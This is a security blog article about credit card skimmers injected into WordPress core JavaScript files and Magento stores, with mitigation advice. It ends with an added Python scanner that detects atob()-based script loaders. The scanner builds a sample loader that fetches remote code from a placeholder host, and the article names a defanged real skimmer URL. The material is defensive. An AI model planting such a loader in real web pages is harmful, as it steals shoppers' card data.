When we talk about malware attacks that steal critical data from websites, the first thing that comes to mind is Magento or other e-commerce platforms. We often forget that WordPress also has a decent share of the e-commerce sector.
Therefore, while discussing credit card skimmers like Magecart, it is crucial to include WordPress alongside Magento and other e-commerce CMSs. There are many plugins that turn a WordPress website into an online store.
One such plugin is WooCommerce, which alone has over 5 million installations.
Credit Card Skimmer Injected in WordPress Core
Plugins are one of the most common causes of malware infection. One example of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js is given below:
Both core files had the following code injected at the very beginning.
This injected code is a typical credit card skimmer injection: the “e.src=atob(...)” call carries the base64-encoded URL of the external skimmer script.
Typical Malware Skimmers Found on Magento
We often find these types of injection scripts on Magento websites. They use obfuscated atob (base64) variations, as well as hundreds of different domains and custom URLs.
For example, on a Magento website we found almost the same copy of the skimmer script (quoted above), with only minor changes.
This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), and it is tailored to the payment forms of that particular site.
Multiple versions of this credit card theft script can be found in the wild, injected into various e-commerce sites.
How to mitigate malware attacks?
Clearly, this is not a fully automated mass infection in which the attackers have one unified kit (a list of vulnerabilities and payloads) that fits all scenarios. Each script has a custom name and content for each particular compromised site.
In this malware campaign, the attackers identify the payment page URL for each target. From there, the custom code collects confidential credit card information from the victim’s payment form.
The malware itself is CMS-agnostic: it does not matter whether a website uses Magento, WordPress or any other e-commerce CMS. If there is a form that accepts payment details and the site can be hacked, nothing prevents a bad actor from installing a skimmer there.
E-commerce website owners should take the security of their website very seriously, as they are ultimately responsible for any breach of customer data resulting from online store transactions.
Particular attention should be paid to hardening and monitoring web pages and server resources. Perform regular security scans of your web assets for malware and other indicators of compromise.
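As an added defensive example (not code from the article or from WordPress), the following Python checker flags the injection pattern described above: an atob()-decoded URL handed to a newly created script element at the beginning of a core JS file. The infected sample and the placeholder host skimmer.example are constructed here for illustration; the regexes and the 512-byte "head" window are assumptions, not a published signature.

```python
import base64
import binascii
import re

# Constructed sample only: the placeholder host is not a real skimmer domain.
PLACEHOLDER_URL = "https://skimmer.example/top/aco.js"
SAMPLE_LOADER = (
    "var e=document.createElement('script');e.src=atob('"
    + base64.b64encode(PLACEHOLDER_URL.encode()).decode()
    + "');document.head.appendChild(e);"
)
# A clean head resembling a minified core file, and the same file with the loader prepended.
CLEAN_CORE_JS = "/*! This file is auto-generated */window.wp=window.wp||{};"
INFECTED_CORE_JS = SAMPLE_LOADER + CLEAN_CORE_JS

# atob('...') with a base64 literal, and nearby script-element creation / src assignment.
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
SCRIPT_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)|\.src\s*=""")


def decode_atob(arg: str) -> str:
    """Decode the atob() argument; invalid base64 yields an empty string."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""


def scan_js(content: str, head_bytes: int = 512) -> list:
    """Return one finding per atob() call, recording whether it sits in the
    head of the file and whether it decodes to a URL fed to a script element."""
    findings = []
    for m in ATOB_RE.finditer(content):
        decoded = decode_atob(m.group(1))
        window = content[max(0, m.start() - 200): m.end() + 200]
        findings.append({
            "offset": m.start(),
            "in_head": m.start() < head_bytes,
            "decoded": decoded,
            "loads_url": decoded.startswith(("http://", "https://", "//"))
            and bool(SCRIPT_RE.search(window)),
        })
    return findings


def is_skimmer_loader(content: str) -> bool:
    """True when a URL-decoding atob() script loader sits at the file head."""
    return any(f["in_head"] and f["loads_url"] for f in scan_js(content))
```

Run it over every file under wp-includes/js and wp-admin/js, and treat any hit as a reason to compare the tree against official WordPress checksums (for example with `wp core verify-checksums`) rather than to trust the scanner alone.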